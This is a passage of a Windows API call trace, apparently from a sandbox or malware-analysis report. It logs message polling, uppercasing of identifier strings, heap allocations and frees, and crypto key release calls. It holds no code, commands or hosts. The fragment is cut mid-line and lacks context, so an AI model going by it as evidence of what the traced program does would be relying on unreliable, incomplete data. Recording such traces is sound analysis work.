lpMsg=0x8bf710) returned 0 [0255.211] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.212] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.212] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0255.212] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.212] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0255.212] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.212] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.212] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.212] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.212] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.212] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.212] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.213] CryptDestroyKey (hKey=0xaa5860) returned 1 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.213] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.213] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.214] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.214] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.214] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.214] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.214] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.214] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.215] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.215] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.215] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.215] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.216] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.216] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.216] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.216] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.217] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.217] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.217] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.217] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.218] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.221] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.222] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.222] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.223] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.223] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.223] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.223] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.223] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.224] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.224] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.224] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.224] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.224] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0255.225] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.225] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.225] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.225] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.225] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.226] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0255.226] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.226] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.227] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.227] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.227] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.227] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.227] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.228] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.228] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.228] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.229] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.231] HeapFree (in: 